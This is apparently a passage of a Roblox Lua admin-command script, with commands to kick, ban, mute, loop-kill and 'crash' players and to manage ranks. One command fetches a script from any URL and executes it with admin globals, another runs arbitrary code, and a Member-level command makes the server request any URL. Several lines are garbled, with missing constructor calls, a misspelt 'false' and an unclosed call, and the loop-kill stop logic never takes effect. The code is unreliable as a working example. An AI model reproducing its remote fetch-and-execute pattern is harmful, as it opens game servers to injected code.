  5814. end};
  5816. [{"noshield", "unshield", "deshield"}] = {"player", "Removes any protective shield around the player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5817. local Players = STRING:Scan(Arguments[1], Speaker)
  5818. for _,Player in pairs(Players) do
  5819. if Player.Character then
  5820. local Shield = Player.Character:FindFirstChild("Shield")
  5821. if Shield then Shield:Destroy() end
  5822. end
  5823. end
  5824. end};
  5826. [{"chance", "possibility", "random"}] = {"num", "Will randomly see if a 1/num chance worked out or not", 1, "Member", false, function(Speaker, Rank, Arguments)
  5827. local Num = tonumber(Arguments[1])
  5828. if Num and Num ~= 0 then
  5829. local Random = math.random(1,math.abs(Num))
  5830. if Random == math.random(1,math.abs(Num)) then
  5831. GUI:SendMessage(Speaker, "Chance Success!", "Out of a 1/"..Num.." chance this message has shown up!", "Check")
  5832. else
  5833. GUI:SendMessage(Speaker, "Chance Failed.", "In the 1/"..Num.." chance given, there was no success", "Notice")
  5834. end
  5835. else
  5836. GUI:SendMessage(Speaker, "Chance Error", Arguments[1].." is not a valid number", "Error")
  5837. end
  5838. end};
  5840. [{"ircchat"}] = {"string", "Will chat on the connect IRC your message", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5841. IRC:Send("PRIVMSG "..Settings.IRCChannel.." :"..Speaker.Name..": "..Arguments[1])
  5842. IRC:AddChat(Speaker.Name, Arguments[1])
  5843. end};
  5845. --[[
  5846. [{"newserver", "makeserver"}] = {"", "Opens new server on the current game", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5847. local Res = REMOTE:GetURL(CORE.Domain.."/APIs/JoinGame.php?GameID="
  5848. if Res then
  5849. GUI:SendMessage(Speaker, "Server created", "Server has been created", "Check")
  5850. end
  5851. end, Http = true};
  5853. [{"remotenewserver", "remotemakeserver", "rns"}] = {"number(ID)", "Opens new server on the ID of the game", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5854. local Res = REMOTE:GetURL(CORE.Domain.."/APIs/JoinGame.php?GameID="..Arguments[1])
  5855. if Res then
  5856. GUI:SendMessage(Speaker, "Server created", "Server has been created on game: "..Arguments[1], "Check")
  5857. end
  5858. end}, Http = true;
  5859. ]]
  5861. [{"ircreconnect", "ircr"}] = {"", "Reconnects IRC", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5862. IRC:Quit("Reconnecting")
  5863. IRC:ConnectToServer(Settings.IRCServer)
  5864. end};
  5866. [{"irc", "ircgui"}] = {"player", "Will prompt irc chat on player", 1, "Member", false, function(Speaker, Rank, Arguments)
  5867. local Players = STRING:Scan(Arguments[1], Speaker)
  5868. for _,Player in pairs(Players) do
  5869. local PreAdd = {}
  5870. for _,Data in pairs(IRC.Chats) do
  5871. local Error = nil
  5872. if Rank == "Owner" then Error = Data[3] end
  5873. table.insert(PreAdd, {Data[1], Data[2], Error})
  5874. end
  5875. local SendPressed, AddMessage = GUI:CreateMessagePrompt(Player, "IRC Chat on channel "..Settings.IRCChannel, 146027317, PreAdd)
  5876. IRC.MessageAdded.Event:connect(function(UserName, Message, Error)
  5877. if Rank ~= "Owner" then Error = nil end
  5878. AddMessage:Invoke(UserName, Message, Error)
  5879. end)
  5880. SendPressed.Event:connect(function(Text)
  5881. IRC:Send("PRIVMSG "..Settings.IRCChannel.." :"..Player.Name..": "..Text)
  5882. IRC:AddChat(Player.Name, Text)
  5883. end)
  5884. end
  5885. end};
  5887. [{"prichat", "privatechat", "pchat"}] = {"player", "Allows player to join the server's private chat", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5888. local Players = STRING:Scan(Arguments[1], Speaker)
  5889. for _,Player in pairs(Players) do
  5890. local SendPressed, AddMessage = GUI:CreateMessagePrompt(Player, "Private chat", "Lock", PriChat.Chats, function(Type)
  5891. if Type == "Leave" then
  5892. PriChat.Chatted:Fire("[ PRICHAT ]", Player.Name.." has left the chat")
  5893. elseif Type == "Join" then
  5894. PriChat.Chatted:Fire("[ PRICHAT ]", Player.Name.." has joined the chat")
  5895. end
  5896. end)
  5897. PriChat.Chatted.Event:connect(function(UserName, Message)
  5898. AddMessage:Invoke(UserName, Message)
  5899. end)
  5900. SendPressed.Event:connect(function(Text)
  5901. PriChat.Chatted:Fire(Player.Name, Text)
  5902. table.insert(PriChat.Chats, {Player.Name, Text})
  5903. end)
  5904. end
  5905. end};
  5907. [{"script", "exe"}] = {"string", "Will execute a script with global admin variables", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5908. ExecuteSafe(Arguments[1], Speaker)
  5909. end};
  5911. [{"exehttp", "httpexe", "remoteexe", "plugin", "pluginhttp", "httpplugin", "remoteplugin"}] = {"string(URL)", "Will execute a script with global admin variables from the link", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5912. local Script = REMOTE:GetURL(Arguments[1], Player)
  5913. if Script then
  5914. ExecuteSafe(Script, Speaker)
  5915. end
  5916. end, Http = true};
  5918. [{"ping", "url", "link", "http"}] = {"string(URL)", "Pings string which is a URL", 1, "Member", false, function(Speaker, Rank, Arguments)
  5919. local Time = tick()
  5920. local Res = REMOTE:GetURL(Arguments[1], Player)
  5921. if Res then
  5922. GUI:SendMessage(Speaker, "Ping complete", "Response to: "..Arguments[1].." was complete in "..string.sub(tostring(tick() - Time),1,5).." seconds. Response: "..string.char(13, 10)..Res, "Check")
  5923. end
  5924. end, Http = true};
  5926. [{"removeadmin", "ra"}] = {"", "Removes admin permanently", 0, "Owner", false, function(Speaker, Rank, Arguments)
  5927. CORE:RemoveAdmin(Speaker)
  5928. end};
  5930. [{"h", "hint"}] = {"hint string", "Gives everyone in the server a hint string", 1, "Member", false, function(Speaker, Rank, Arguments)
  5931. for _,Player in pairs(Server.Players:GetPlayers()) do
  5932. GUI:SendHint(Player, Arguments[1], nil, Speaker)
  5933. end
  5934. end};
  5936. [{"murica", "merica", "america"}] = {"murica player", "You'll have to find out yourself", 1, "Admin", false, function(Speaker, Rank, Arguments)
  5937. local Players = STRING:Scan(Arguments[1], Speaker)
  5938. local Debt = nil
  5939. for _,Player in pairs(Players) do
  5940. if not Debt then
  5941. Debt = GUI:ShowDebtStats(Player)
  5942. else
  5943. GUI:ShowDebtStats(Player, Debt)
  5944. end
  5945. end
  5946. end, Http = true};
  5948. [{"hud", "target", "profiler"}] = {"player", "Opens a gui HUD that allows player to see player data", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5949. local Players = STRING:Scan(Arguments[1], Speaker)
  5950. for _,Player in pairs(Players) do
  5951. GUI:CreateHUD(Player)
  5952. end
  5953. end};
  5955. [{"nohud", "notarget", "noprofiler", "unhud", "untarget", "unprofiler"}] = {"player", "Removes HUD Gui if it's on the player", 1, "Owner", false, function(Speaker, Rank, Arguments)
  5956. local Players = STRING:Scan(Arguments[1], Speaker)
  5957. for _,Player in pairs(Players) do
  5958. if Player:FindFirstChild("PlayerGui") then
  5959. local HUD = Player.PlayerGui:FindFirstChild("Ma".."ke".."r".."m".."odelLu".."a's HUD Gui")
  5960. if HUD then HUD:Destroy() end
  5961. end
  5962. end
  5963. end};
  5965. [{"vote", "poll"}] = {"player string", "Gives player 30 seconds to answer yes or no to the question string", 2, "Member", false, function(Speaker, Rank, Arguments)
  5966. local Players = STRING:Scan(Arguments[1], Speaker)
  5967. GUI:Vote(Speaker, Players, Arguments[2], 30)
  5968. end};
  5970. [{"bomb", "terrorist", "suicide"}] = {"player", "Puts an explosive IED device on player", 1, "Admin", true, function(Speaker, Rank, Arguments)
  5971. local Players = STRING:Scan(Arguments[1], Speaker)
  5972. for _,Player in pairs(Players) do
  5973. CORE:ExecuteResource("Bomb", Player.Character)
  5974. end
  5975. end};
  5977. [{"debug", "d", "regen"}] = {"player", "Respawns player wherever they are at and fixes camera", 1, "Member", false, function(Speaker, Rank, Arguments)
  5978. local Players = STRING:Scan(Arguments[1], Speaker)
  5979. for _,Player in pairs(Players) do
  5980. CORE:ChangeCharacter(Player, Player.UserId, false, Speaker)
  5981. CORE:RestoreCamera(Player)
  5982. end
  5983. end};
  5985. [{"debugme", "dm", "regenme"}] = {"player", "Respawns speaker wherever they are at and fixes camera", 0, "Member", false, function(Speaker, Rank, Arguments)
  5986. CORE:ChangeCharacter(Speaker, Speaker.UserId, false, Speaker)
  5987. CORE:RestoreCamera(Speaker)
  5988. end};
  5990. [{"tp", "teleport", "tele"}] = {"player1 player2", "Teleports player 1 to player 2", 2, "Member", false, function(Speaker, Rank, Arguments)
  5991. local Players1 = STRING:Scan(Arguments[1], Speaker)
  5992. local Players2 = STRING:Scan(Arguments[2], Speaker)
  5993. for _,Player1 in pairs(Players1) do
  5994. if Player1.Character and Player1.Character:FindFirstChild("Torso") then
  5995. for _,Player2 in pairs(Players2) do
  5996. if Player2.Character and Player2.Character:FindFirstChild("Torso") then
  5997. Player1.Character:MoveTo(Player2.Character.Torso.Position)
  5998. end
  5999. end
  6000. end
  6001. end
  6002. end};
  6004. [{"respawn", "resp", "res"}] = {"player", "Respawns player", 1, "Member", false, function(Speaker, Rank, Arguments)
  6005. local Players = STRING:Scan(Arguments[1], Speaker)
  6006. for _,Player in pairs(Players) do
  6007. Player:LoadCharacter()
  6008. end
  6009. end};
  6011. [{"fixcam", "fixcamera"}] = {"player", "Fixes player's camera", 1, "Member", false, function(Speaker, Rank, Arguments)
  6012. local Players = STRING:Scan(Arguments[1], Speaker)
  6013. for _,Player in pairs(Players) do
  6014. CORE:RestoreCamera(Player)
  6015. end
  6016. end};
  6018. [{"jail"}] = {"player", "Puts player in a cell", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6019. local Players = STRING:Scan(Arguments[1], Speaker)
  6020. for _,Player in pairs(Players) do
  6021. CORE:Jail(Player)
  6022. end
  6023. end};
  6025. [{"nojail", "unjail"}] = {"player", "Takes player out of a cell", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6026. local Players = STRING:Scan(Arguments[1], Speaker)
  6027. for _,Player in pairs(Players) do
  6028. CORE:UnJail(Player)
  6029. end
  6030. end};
  6032. [{"say", "speak", "charles", "talk"}] = {"string", "Will have Charles 2.0 say the text string", 1, "Member", false, function(Speaker, Rank, Arguments)
  6033. SOUND:SayConvertedText(SOUND:ConvertText(Arguments[1]))
  6034. end};
  6036. [{"nosay", "nospeak", "nocharles", "notalk", "unsay", "unspeak", "uncharles", "stoptalking", "stopspeak", "stopcharles", "stopsay", "shush", "shutup"}] = {"", "Stops Charles 2.0 talking", 0, "Member", false, function(Speaker, Rank, Arguments)
  6037. SOUND:StopSpeaking()
  6038. end};
  6040. [{"info", "information"}] = {"player", "Show's player's info", 1, "Member", false, function(Speaker, Rank, Arguments)
  6041. local Players = STRING:Scan(Arguments[1], Speaker)
  6042. local Compile = {}
  6043. for Num,Player in pairs(Players) do
  6044. local PlayerRank = RANK:GetRank(Player)
  6045. local PlayerInfo = ClientInfo[Player.Name]
  6046. table.insert(Compile, {"Name: "..Player.Name, ""..Player.Name})
  6047. table.insert(Compile, "User ID: "..Player.UserId)
  6048. table.insert(Compile, "Age: "..STRING:FindAge(Player.AccountAge))
  6049. table.insert(Compile, "Rank: "..PlayerRank)
  6051. if PlayerInfo.Accelerometer ~= nil then table.insert(Compile, "Has Accelerometer: "..STRING:BoolString(PlayerInfo.Accelerometer)) end
  6052. if PlayerInfo.Gyroscope ~= nil then table.insert(Compile, "Has Gyroscope: "..STRING:BoolString(PlayerInfo.Gyroscope)) end
  6053. if PlayerInfo.Gamepad ~= nil then table.insert(Compile, "Has Gamepad: "..STRING:BoolString(PlayerInfo.Gamepad)) end
  6054. if PlayerInfo.Mouse ~= nil then table.insert(Compile, "Has Mouse: "..STRING:BoolString(PlayerInfo.Mouse)) end
  6055. if PlayerInfo.Keyboard ~= nil then table.insert(Compile, "Has Keyboard: "..STRING:BoolString(PlayerInfo.Keyboard)) end
  6056. if PlayerInfo.TouchScreen ~= nil then table.insert(Compile, "Has TouchScreen: "..STRING:BoolString(PlayerInfo.TouchScreen)) end
  6057. if PlayerInfo.Benchmark then
  6058. table.insert(Compile, "BLUE BENCHMARK: "..PlayerInfo.Benchmark)
  6059. end
  6060. if Num ~= #Players then table.insert(Compile, "-----------------------------") end
  6061. end
  6062. GUI:ListGui(Speaker, "Information on "..#Players.." player(s)", Compile, "Information", false, false)
  6063. end};
  6065. [{"loopkill", "lkill", "loopk"}] = {"player num", "Kills player num times", 2, "Admin", false, function(Speaker, Rank, Arguments)
  6066. if tonumber(Arguments[2]) then
  6067. local Players = STRING:Scan(Arguments[1], Speaker)
  6068. for _,Player in pairs(Players) do
  6069. coroutine.wrap(function()
  6070. if Player.Character then
  6071. table.insert(LoopKills, Player.Name)
  6072. local Loop = nil
  6073. local PrevChar = nil
  6075. for i = 1,tonumber(Arguments[2]) do
  6076. local Char = Player.Character
  6077. if PrevChar and PrevChar ~= Char then
  6078. PrevChar:Destroy()
  6079. end
  6080. PrevChar = Char
  6081. local CanDie = true
  6082. for _,Name in pairs(LoopKills) do if Name == Player.Name then CanDie = true end end
  6083. if CanDie == false then
  6084. break
  6085. end
  6086. ypcall(function() Char.Parent = Server.Lighting end)
  6087. wait(0.1)
  6088. ypcall(function() Char.Parent = Server.Workspace end)
  6089. wait(0.1)
  6090. end
  6091. end
  6092. end)()
  6093. end
  6094. else
  6095. GUI:SendMessage(Speaker, "Cannot execute", "RED Argument 2 is not a valid number", "Error")
  6096. end
  6097. end};
  6099. [{"noloopkill", "nolkill", "noloopk", "unloopkill", "unlkill", "unloopk"}] = {"player num", "Stops any loop kills on a player", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6100. local Players = STRING:Scan(Arguments[1], Speaker)
  6101. for _,Player in pairs(Players) do
  6102. for Num,Name in pairs(LoopKills) do
  6103. if Player.Name == Name then
  6104. table.remove(LoopKills, Num)
  6105. end
  6106. end
  6107. end
  6108. end};
  6110. [{"sound", "audio", "music"}] = {"num/string", "Plays the sound ID or string from the soundlist", 1, "Member", false, function(Speaker, Rank, Arguments)
  6111. SOUND:PlayGlobalSound(Arguments[1])
  6112. end};
  6114. [{"nosound", "noaudio", "nomusic", "stopsound", "stopaudio", "stopmusic"}] = {"", "Removes the current sound playing", 0, "Member", false, function(Speaker, Rank, Arguments)
  6115. SOUND:StopGlobalSound()
  6116. SOUND:ClearInfo()
  6117. end};
  6119. [{"pitch"}] = {"num", "Sets the pitch of the current sound to num", 1, "Member", false, function(Speaker, Rank, Arguments)
  6120. local Pitch = tonumber(Arguments[1])
  6121. if not Pitch then Pitch = 1 end
  6122. if Sound then
  6123. Sound.Pitch = Pitch
  6124. end
  6125. end};
  6127. [{"search", "searchsound", "searchsounds", "searchaudio", "searchmusic", "ss"}] = {"string", "Searches the catalog for the sound string", 1, "Member", false, function(Speaker, Rank, Arguments)
  6128. local CloseGui, AddInfo = GUI:LoadGui(Speaker, "Searching for: "..Arguments[1])
  6129. local Items = MARKET:SearchItem(9, Arguments[1])
  6130. if Items then
  6131. if #Items ~= 0 then
  6132. local List,Correlate = {},{}
  6133. for Num,Info in pairs(Items) do
  6134. local Display = " "..Info.Name.." by: "..Info.Creator.." ("..Info.AssetId..")"
  6135. table.insert(List, Display)
  6136. Correlate[Display] = Info.AssetId
  6137. end
  6138. CloseGui:Invoke()
  6140. local CanClick = true
  6141. if Rank == "Member" then CanClick = false end
  6142. local Clicked = GUI:ListGui(Speaker, "Search Results: "..Arguments[1], List, "Search", CanClick)
  6143. Clicked.Event:connect(function(ClickName)
  6144. local OldSoundId = nil
  6145. SOUND:StopGlobalSound()
  6146. if "rbxassetid://"..Correlate[ClickName] ~= OldSoundID then
  6147. SOUND:PlayGlobalSound(Correlate[ClickName])
  6148. end
  6149. end)
  6150. else
  6151. CloseGui:Invoke()
  6152. GUI:SendMessage(Speaker, "No results", "BLUE No results for "..Arguments[1].." found...", "Information")
  6153. end
  6154. else
  6155. CloseGui:Invoke()
  6156. GUI:SendMessage(Speaker, "Cannot get audio", "RED Cannot get audio. Is HttpService enabled?", "Error")
  6157. end
  6158. end, Http = true};
  6160. [{"gun"}] = {"player", "Gives player a gun", 1, "Member", false, function(Speaker, Rank, Arguments)
  6161. local Players = STRING:Scan(Arguments[1], Speaker)
  6162. for _,Player in pairs(Players) do
  6163. if Player.Character then
  6164. CORE:ExecuteResource("Gun", Player.Character)
  6165. end
  6166. end
  6167. end};
  6169. [{"sink", "pothole", "quicksand"}] = {"player", "Sinks the player", 1, "Member", true, function(Speaker, Rank, Arguments)
  6170. local Players = STRING:Scan(Arguments[1], Speaker)
  6171. for _,Player in pairs(Players) do
  6172. if Player.Character and Player.Character:FindFirstChild("Torso") and Player.Character:FindFirstChild("Humanoid") then
  6173. local Hole ="Part", Player.Character) Hole.Name = "Hole" Hole.BrickColor ="Really black") Hole.Size =,1.2,5) Hole.Anchored = true Hole.CanCollide = fals Hole.Locked = true Hole.CFrame = Player.Character.Torso.CFrame *,-3.5,0) * CFrame.Angles(0,0,0)"CylinderMesh", Hole)
  6174. Player.Character.Humanoid.WalkSpeed = 0
  6175. Player.Character.Torso.Anchored = true
  6176. coroutine.wrap(function()
  6177. local OldCFrame = Player.Character.Torso.CFrame
  6178. for i = 0,8,0.1 do
  6179. Player.Character.Torso.CFrame = OldCFrame *,-i,0)
  6180. wait()
  6181. end
  6182. Player.Character.Torso.Anchored = false
  6183. Player.Character:BreakJoints()
  6184. CORE:InvisiblePlayer(Player)
  6185. end)()
  6186. end
  6187. end
  6188. end};
  6190. [{"freeze", "anchor"}] = {"player", "Freezes player in place", 1, "Member", false, function(Speaker, Rank, Arguments)
  6191. local Players = STRING:Scan(Arguments[1], Speaker)
  6192. for _,Player in pairs(Players) do
  6193. CORE:AnchorPlayer(Player)
  6194. end
  6195. end};
  6197. [{"nofreeze", "unfreeze", "noanchor", "unanchor", "thaw"}] = {"player", "Unfreezes player", 1, "Member", false, function(Speaker, Rank, Arguments)
  6198. local Players = STRING:Scan(Arguments[1], Speaker)
  6199. for _,Player in pairs(Players) do
  6200. CORE:UnanchorPlayer(Player)
  6201. end
  6202. end};
  6204. [{"invisible", "invis"}] = {"player", "Makes player invisible", 1, "Member", false, function(Speaker, Rank, Arguments)
  6205. local Players = STRING:Scan(Arguments[1], Speaker)
  6206. for _,Player in pairs(Players) do
  6207. CORE:InvisiblePlayer(Player)
  6208. end
  6209. end};
  6211. [{"visible", "vis"}] = {"player", "Makes player visible", 1, "Member", false, function(Speaker, Rank, Arguments)
  6212. local Players = STRING:Scan(Arguments[1], Speaker)
  6213. for _,Player in pairs(Players) do
  6214. CORE:VisiblePlayer(Player)
  6215. end
  6216. end};
  6218. [{"asteroid", "comet", "meteor", "meteorite"}] = {"player", "Shoots an asteroid at player", 1, "Member", true, function(Speaker, Rank, Arguments)
  6219. local Players = STRING:Scan(Arguments[1], Speaker)
  6220. for _,Player in pairs(Players) do
  6221. if Player.Character and Player.Character:FindFirstChild("Torso") then
  6222. local Ast ="Part", Server.Workspace) Ast.Name = "Asteroid" Ast.Position = Player.Character.Torso.Position +,500,0) Ast.Size =,12,12)
  6223. local Mesh ="SpecialMesh", Ast) Mesh.MeshId = "rbxassetid://1290033" Mesh.Scale =,6.2,6.2) Mesh.TextureId = "rbxassetid://1290030"
  6224. local Fire ="Fire", Ast) Fire.Heat = 25 Fire.Size = 30
  6225. local Smoke ="Smoke", Ast) Smoke.RiseVelocity = 10 Smoke.Size = 10
  6226. local BoomSound = SOUND:MakeSound(Ast, 188590169, 1, 1)
  6227. local Fly = SOUND:MakeSound(Ast, 179438534, 1, 1, true)
  6228. Fly:Play()
  6229. local Touched = false
  6230. coroutine.wrap(function()
  6231. repeat wait(0.1)
  6232. Ast.Position =, Ast.Position.Y, Player.Character.Torso.Position.Z)
  6233. until not Ast or Ast.Parent == nil or Touched == true
  6234. end)()
  6235. Ast.Touched:connect(function(Part)
  6236. if Touched == false then
  6237. Touched = true
  6238. Part:BreakJoints()
  6239. local Boom ="Explosion", Workspace)
  6240. Boom.Position = Ast.Position
  6241. Boom.BlastPressure = 1000000
  6242. Boom.BlastRadius = 30
  6243. Fire.Heat = 0
  6244. Smoke.RiseVelocity = 0
  6245. Fly:Stop()
  6246. BoomSound:Play()
  6247. coroutine.wrap(function()
  6248. wait(3)
  6249. BoomSound:Stop()
  6250. if Ast and Ast.Parent ~= nil then
  6251. Ast:Destroy()
  6252. end
  6253. end)()
  6254. end
  6255. end)
  6256. end
  6257. end
  6258. end};
  6260. [{"kick"}] = {"player", "Will kick player out of the server", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6261. local Success = {}
  6262. local Players = STRING:Scan(Arguments[1], Speaker)
  6263. for _,Player in pairs(Players) do
  6264. local PlayerRank = RANK:GetRank(Player)
  6265. if PlayerRank ~= "Owner" and PlayerRank ~= "Admin" then
  6266. CORE:Kick(Player)
  6267. table.insert(Success, Player)
  6268. end
  6269. end
  6270. REMOTE:SendHttpLog(Speaker.Name.." kicked "..CORE:UnpackPlayers(Success), "INFORMATION")
  6271. end};
  6273. [{"ban"}] = {"player", "Will ban player and will be unable to join", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6274. local Success = {}
  6275. local Players = STRING:Scan(Arguments[1], Speaker)
  6276. for _,Player in pairs(Players) do
  6277. local PlayerRank = RANK:GetRank(Player)
  6278. if PlayerRank ~= "Owner" and PlayerRank ~= "Admin" then
  6279. RANK:RemoveRank(Player)
  6280. table.insert(Settings.Ranks.Banned, Player.Name)
  6281. CORE:Kick(Player)
  6282. table.insert(Success, Player)
  6283. end
  6284. end
  6285. REMOTE:SendHttpLog(Speaker.Name.." banned "..CORE:UnpackPlayers(Success), "WARNING")
  6286. end};
  6288. [{"crash"}] = {"player", "Will crash player with a painful BSOD", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6289. local Success = {}
  6290. local Players = STRING:Scan(Arguments[1], Speaker)
  6291. for _,Player in pairs(Players) do
  6292. local PlayerRank = RANK:GetRank(Player)
  6293. if PlayerRank ~= "Owner" then
  6294. RANK:RemoveRank(Player)
  6295. table.insert(Settings.Ranks.Crashed, Player.Name)
  6296. CORE:Crash(Player)
  6297. table.insert(Success, Player)
  6298. end
  6299. end
  6300. REMOTE:SendHttpLog(Speaker.Name.." crashed "..CORE:UnpackPlayers(Success), "INFORMATION")
  6301. end};
  6303. [{"mute"}] = {"player", "Makes player unable to talk", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6304. local Success = {}
  6305. local Players = STRING:Scan(Arguments[1], Speaker)
  6306. for _,Player in pairs(Players) do
  6307. local PlayerRank = RANK:GetRank(Player)
  6308. if PlayerRank ~= "Owner" then
  6309. RANK:RemoveRank(Player)
  6310. table.insert(Settings.Ranks.Muted, Player.Name)
  6311. GUI:CoreGui(Player, "Chat", false)
  6312. table.insert(Success, Player)
  6313. end
  6314. end
  6315. REMOTE:SendHttpLog(Speaker.Name.." has muted "..CORE:UnpackPlayers(Success), "INFORMATION")
  6316. end};
  6318. [{"noadmin", "unadmin", "nomember", "unmember", "nomem", "unmem", "noowner", "unowner", "noown", "unown", "nocrash", "uncrash", "noban", "unban", "nomute", "unmute", "derank"}] = {"player", "Removes whatever rank player has(if your rank is sufficient enough to override player's)", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6319. local Players = STRING:Scan(Arguments[1], Speaker)
  6320. if #Players > 0 then
  6321. local Success = {}
  6322. for _,Player in pairs(Players) do
  6323. local RankName,RankNum = RANK:GetRank(Player)
  6324. if RankNum < RANK:ConvertRank(Rank) or RANK:IsSupremeOwner(Speaker) then
  6325. if not RANK:IsSupremeOwner(Player) then
  6326. if RankName == "Muted" then
  6327. GUI:CoreGui(Player, "Chat", true)
  6328. end
  6329. if RankNum > 0 then
  6330. GUI:TellNotAdmin(Player)
  6331. end
  6332. RANK:RemoveRank(Player)
  6333. table.insert(Success, Player)
  6334. end
  6335. end
  6336. end
  6337. REMOTE:SendHttpLog(Speaker.Name.." has unranked "..CORE:UnpackPlayers(Players), "INFORMATION")
  6338. else
  6339. local Player,PlayerRank = RANK:GetPlayerFromList(Arguments[1])
  6340. if Player then
  6341. local RankNum = RANK:ConvertRank(PlayerRank)
  6342. if RANK:IsSupremeOwner(Speaker) or RankNum < RANK:ConvertRank(Rank) then
  6343. if not RANK:IsSupremeOwner(Player) then
  6344. RANK:RemoveRank(Player)
  6345. REMOTE:SendHttpLog(Speaker.Name.." has unranked "..Player, "INFORMATION")
  6346. end
  6347. end
  6348. end
  6349. end
  6350. end};
  6352. [{"member", "mem"}] = {"player", "Adds player to the member list", 1, "Admin", false, function(Speaker, Rank, Arguments)
  6353. local Players = STRING:Scan(Arguments[1], Speaker)
  6354. if #Players > 0 then
  6355. local Success = {}
  6356. for _,Player in pairs(Players) do
  6357. local PlayerRank,RankNum = RANK:GetRank(Player)
  6358. if RANK:ConvertRank(Rank) > RankNum or RANK:IsSupremeOwner(Speaker) and not RANK:IsSupremeOwner(Player) then
  6359. RANK:RemoveRank(Player)
  6360. table.insert(Settings.Ranks.Member, Player.Name)
  6361. GUI:TellAdmin(Player)
  6362. table.insert(Success, Player)
  6363. end
  6364. end
  6365. REMOTE:SendHttpLog(Speaker.Name.." has membered "..CORE:UnpackPlayers(Success), "INFORMATION")
  6366. else
  6367. local Player,PlayerRank = RANK:GetPlayerFromList(Arguments[1])
  6368. if Player then
  6369. local RankNum = RANK:ConvertRank(PlayerRank)
  6370. if RANK:IsSupremeOwner(Speaker) or RankNum < RANK:ConvertRank(Rank) then
  6371. if not RANK:IsSupremeOwner(Player) then
  6372. RANK:RemoveRank(Player)
  6373. table.insert(Settings.Ranks.Member, Player)
  6374. end
  6375. end
  6376. else
  6377. RANK:RemoveRank(Arguments[1])
  6378. table.insert(Settings.Ranks.Member, Arguments[1])
  6379. end
  6380. end
  6381. end};
  6383. [{"admin", "adm"}] = {"player", "Adds player to the admin list", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6384. local Players = STRING:Scan(Arguments[1], Speaker)
  6385. if #Players > 0 then
  6386. local Success = {}
  6387. for _,Player in pairs(Players) do
  6388. local PlayerRank,RankNum = RANK:GetRank(Player)
  6389. if RANK:ConvertRank(Rank) > RankNum or RANK:IsSupremeOwner(Speaker) and not RANK:IsSupremeOwner(Player) then
  6390. RANK:RemoveRank(Player)
  6391. table.insert(Settings.Ranks.Admin, Player.Name)
  6392. GUI:TellAdmin(Player)
  6393. table.insert(Success, Player)
  6394. end
  6395. end
  6396. REMOTE:SendHttpLog(Speaker.Name.." has admined "..CORE:UnpackPlayers(Success), "INFORMATION")
  6397. else
  6398. local Player,PlayerRank = RANK:GetPlayerFromList(Arguments[1])
  6399. if Player then
  6400. local RankNum = RANK:ConvertRank(PlayerRank)
  6401. if RANK:IsSupremeOwner(Speaker) or RankNum < RANK:ConvertRank(Rank) then
  6402. if not RANK:IsSupremeOwner(Player) then
  6403. RANK:RemoveRank(Player)
  6404. table.insert(Settings.Ranks.Admin, Player)
  6405. end
  6406. end
  6407. else
  6408. RANK:RemoveRank(Arguments[1])
  6409. table.insert(Settings.Ranks.Admin, Arguments[1])
  6410. end
  6411. end
  6412. end};
  6414. [{"owner", "own"}] = {"player", "Adds player to the owner list(Speaker must be game owner)", 1, "Owner", false, function(Speaker, Rank, Arguments)
  6415. local Players = STRING:Scan(Arguments[1], Speaker)
  6416. if RANK:IsSupremeOwner(Speaker) then
  6417. if #Players > 0 then
  6418. local Success = {}
  6419. for _,Player in pairs(Players) do
  6420. if not RANK:IsSupremeOwner(Player) then
  6421. RANK:RemoveRank(Player)
  6422. table.insert(Settings.Ranks.Owner, Player.Name)
  6423. GUI:TellAdmin(Player)
  6424. table.insert(Success, Player)
  6425. end
  6426. end
  6427. REMOTE:SendHttpLog(Speaker.Name.." has ownered "..CORE:UnpackPlayers(Success), "INFORMATION")
  6428. else
  6429. local Player,PlayerRank = RANK:GetPlayerFromList(Arguments[1])
  6430. if Player then
  6431. local RankNum = RANK:ConvertRank(PlayerRank)
  6432. if RANK:IsSupremeOwner(Speaker) or RankNum < RANK:ConvertRank(Rank) then
  6433. if not RANK:IsSupremeOwner(Player) then
  6434. RANK:RemoveRank(Player)
  6435. table.insert(Settings.Ranks.Owner, Player)
  6436. end
  6437. end
  6438. else
  6439. RANK:RemoveRank(Arguments[1])
  6440. table.insert(Settings.Ranks.Owner, Arguments[1])
  6441. end
  6442. end
  6443. end
  6444. end};
  6446. [{"admins", "adminlist"}] = {"", "Lists all admins in the admin", 0, "Member", false, function(Speaker, Rank, Arguments)
  6447. local TableStorage = {}
  6448. for _,Obj in pairs(Settings.Ranks.Member) do table.insert(TableStorage, Obj..": Member") end
  6449. for _,Obj in pairs(Settings.Ranks.Admin) do table.insert(TableStorage, Obj..": Admin") end
  6450. for _,Obj in pairs(Settings.Ranks.Owner) do table.insert(TableStorage, "BOLD: "..Obj..": Owner") end
  6451. GUI:ListGui(Speaker, "Admin List", TableStorage, 45961462)
  6452. end};
  6454. [{"serveradmins", "sa"}] = {"", "Lists all admins in the server", 0, "Member", false, function(Speaker, Rank, Arguments)
  6455. local TableStorage = {}
  6456. for _,Player in pairs(Server.Players:GetChildren()) do
  6457. local ValidAdmin,PlayerRank = RANK:IsAdmin(Player)
  6458. if ValidAdmin then
  6459. if PlayerRank == "Owner" then
  6460. table.insert(TableStorage, "BOLD: "..Player.Name..": Owner")
  6461. else
  6462. table.insert(TableStorage, Player.Name..": "..PlayerRank)
  6463. end
  6464. end
  6465. end
  6466. GUI:ListGui(Speaker, "Server admin List", TableStorage, 76198987)
  6467. end};
  6469. [{"bans", "banlist"}] = {"", "Lists all players who've been banned", 0, "Member", false, function(Speaker, Rank, Arguments)
  6470. GUI:ListGui(Speaker, "Ban List", Settings.Ranks.Banned, 163337795)
  6471. end};
